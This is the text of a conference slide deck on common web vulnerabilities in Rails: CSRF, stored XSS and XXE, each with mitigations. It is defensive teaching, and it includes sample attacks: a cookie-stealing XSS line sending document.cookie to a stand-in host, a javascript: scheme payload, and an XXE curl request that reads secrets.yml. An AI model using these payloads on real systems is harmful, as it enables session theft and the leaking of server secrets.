Security is Broken: Understanding Common Vulnerabilties

SECURITY IS BROKEN
Understanding Common Vulnerabilities

View Slide

View Slide

EILEEN M. UCHITELLE
Security, Infrastructure & Performance
Team at Basecamp
! eileencodes.com
" @eileencodes
# @eileencodes
! speakerdeck.com/eileencodes

View Slide

OPEN SOURCE
Rails Committers
Rails Security

View Slide

View Slide

How is security
broken?

View Slide

• Impossible to test for all possible
vulnerabilities
How is security broken?

View Slide

vulnerabilities
• Hackers are always one step ahead

View Slide

vulnerabilities
• Hackers are always one step ahead
• Patching one vulnerability can lead to
exposing new ones

View Slide

How did we get
here?

View Slide

• Failed to enforce web standards
How did we get here?

View Slide

vs.

View Slide

View Slide

• Failed to implement a deﬁnition of
security

View Slide

“...completely failed to come up with
even the most rudimentary usable
frameworks for understanding the
security of modern software.”
– Michal Zalewski, The Tangled Web

View Slide

• Failed to implement a deﬁnition of
security
• Too few people understand the
vulnerabilities

View Slide

View Slide

CSRF

View Slide

CSRF
Cross-Site Request Forgery

View Slide

EXPLOITING CSRF

View Slide

JESSIE
The Hacker
ARYA
The User

View Slide

View Slide

Name

Email

Website

View Slide

View Slide

Looks the same, different URL

View Slide

Name

Email

Website

View Slide

Name

Email

Website

Jessie’s email

View Slide

Name

Email

Website

Auto-submit form

View Slide

Name

Email

Website

Auto-submit form
to victim site

View Slide

Jessie’s email

View Slide

How dangerous are
CSRF attacks?

View Slide

How can we protect 
our users from 
CSRF attacks?

View Slide

• Use built-in framework CSRF protection
How to mitigate CSRF?

View Slide

View Slide

class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
end

View Slide

name=authenticity_token" />
Name

Email

Website

CSRF protection

View Slide

Caveat:
CSRF protection in Rails is
order-dependent

View Slide

before_action :authenticate
protect_from_forgery with: :exception,
if: -> { authenticate_method.web? }
end

View Slide

end
Conditional
authentication

View Slide

end
class ChatsController < ApplicationController
skip_before_action :authenticate
before_action :authenticate_for_chat, only: :create
end

View Slide

end
class ChatsController < ApplicationController
end
Skip auth callback

View Slide

>> ChatsController._process_action_callbacks.map(&:filter)
=>[
:authenticate,
:verify_authenticity_token,
:authenticate_for_chat
]
Authentication callback
is too late in the chain

View Slide

end
class ChatsController < ActionController::Base
end

View Slide

>> ChatsController._process_action_callbacks.map(&:filter)
=>[
:authenticate,
:authenticate_for_chat,
:verify_authenticity_token
]
Corrected
callback order

View Slide

View Slide

• Refresh tokens with the session / don’t
reuse tokens

View Slide

class SessionsController < ApplicationController
def destroy
sign_out
reset_session
redirect_to sign_in_url
end
end
Refreshes
Authenticity Token

View Slide

• Refresh tokens with the session / don’t
reuse tokens
• Mitigate XSS attacks

View Slide

XSS

View Slide

XSS
Cross-Site Scripting

View Slide

EXPLOITING STORED XSS

View Slide

View Slide

document.write( '<img src=“http://www.hax0rcats.com/' + document.cookie + '">' ); 
automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

View Slide

View Slide

Escaped HTML

View Slide

Profile
<%= notice %>

Name:
<%= @user.name %>

Email:
<%= @user.email %>

Website:
<%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> |
<%= link_to 'Back', users_path %>

View Slide

Profile
<%= notice %>

Name:
<%= (@user.name).html_safe %>

Email:
<%= @user.email %>

Website:

automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

View Slide

View Slide

JavaScript Scheme

View Slide

View Slide

javascript://example.com/%0Aalert(1)

View Slide

example.com/%0Aalert(1)
JavaScript Scheme
javascript://

View Slide

URL
example.com

View Slide

Percent encoded “line feed”
%0A

View Slide

JavaScript Alert
alert(1)

View Slide

How dangerous are
XSS attacks?

View Slide

our users from 
XSS attacks?

View Slide

• Always escape user-provided data
How to mitigate XSS?

View Slide

Profile
<%= notice %>

Name:
<%= (@user.name).html_safe %>

Email:
<%= @user.email %>

Website:

Don’t do this

View Slide

View Slide

• Don’t HTML escape user-provided data
• Sanitize user-provided data

View Slide

Profile
<%= notice %>

Name:
<%= sanitize(@user.name) %>

Email:
<%= @user.email %>

Website:

Will strip out unwanted
tags and attributes

View Slide

• Don’t HTML escape user-provided data
• Sanitize user-provided data
• Validate user-provided data

View Slide

class User < ActiveRecord::Base
WHITELISTED_URI_SCHEMES = %w( http https )
validate :check_uri_scheme
private
def check_uri_scheme
begin
uri = URI.parse(website)
unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
errors.add :website, 'is not an allowed URI scheme'
end
rescue URI::InvalidURIError
errors .add :website, 'is not a valid URI'
end
end
end

View Slide

XXE

View Slide

XXE
XML eXternal Entity Attack

View Slide

]>

Take a nap
Go on a long walk with my hooman
&ext1;
Take another nap
Go to bed

View Slide

]>

Take a nap
&ext1;
Take another nap
Go to bed

Entity reference

View Slide

Eat breakfast
Bark at the mail carrier

View Slide

Take a nap
Eat breakfast
Bark at the mail carrier
Take another nap
Go to bed

View Slide

EXPLOITING XXE

View Slide

class UsersController < ApplicationController
def create
@user = User.new(user_params)
respond_to do |format|
if @user.save
format.html { redirect_to @user }
format.xml { render :xml => @user.to_xml }
else
format.html { render :new }
format.xml { render xml: @user.errors.to_xml }
end
end
end
end

View Slide

class UsersController < ApplicationController
def create
@user = User.new(user_params)
respond_to do |format|
if @user.save
format.html { redirect_to @user }
format.xml { render :xml => @user.to_xml }
else
format.html { render :new }
format.xml { render xml: @user.errors.to_xml }
end
end
end
end
XML

View Slide

config/secrets.yml">
]>

&name;

View Slide

]>

&name;

Requested ﬁle

View Slide

]>

&name;

Entity reference

View Slide

curl -X 'POST'
-H 'Content-Type: application/xml'
-d @xxe.xml
http://dogbook.com/users.xml
POST request to
users create

View Slide

curl -X 'POST'
-d @xxe.xml
Payload

View Slide

curl -X 'POST'
-d @xxe.xml

...
production:
secret_key_base:
271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5
f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40
00e166a9a5
...

secrets.yml
as user’s name

View Slide

View Slide

How dangerous are
XXE attacks?

View Slide

View Slide

our servers from 
XXE attacks?

View Slide

• Don’t parse XML
How to mitigate XXE?

View Slide

Don’t parse XML

View Slide

• Don’t use parsers that allow entity
replacement (LibXML)

View Slide

>> LibXML::XML.default_substitute_entities
>> true

View Slide

• Don’t use parsers that allow entity
replacement (LibXML)
• Whitelist known entities

View Slide

Investigate vulnerabilities & patches
SECURITY

View Slide

GitHub 
eileencodes/security_examples

View Slide

owasp.org

View Slide

View Slide

Brakeman

View Slide

Resilience & empowerment
SECURITY

View Slide

View Slide

Awareness of vulnerabilities
SECURITY

View Slide

JESSIE
The Hacker
ARYA
The User

View Slide

View Slide

To the future

View Slide

EILEEN M. UCHITELLE
Security, Infrastructure & Performance
Team at Basecamp
! eileencodes.com
" @eileencodes
# @eileencodes
! speakerdeck.com/eileencodes

View Slide

Security is Broken: Understanding Common Vulnerabilties

Security is Broken: Understanding Common Vulnerabilties

Eileen M. Uchitelle

More Decks by Eileen M. Uchitelle

Other Decks in Technology

Featured

Transcript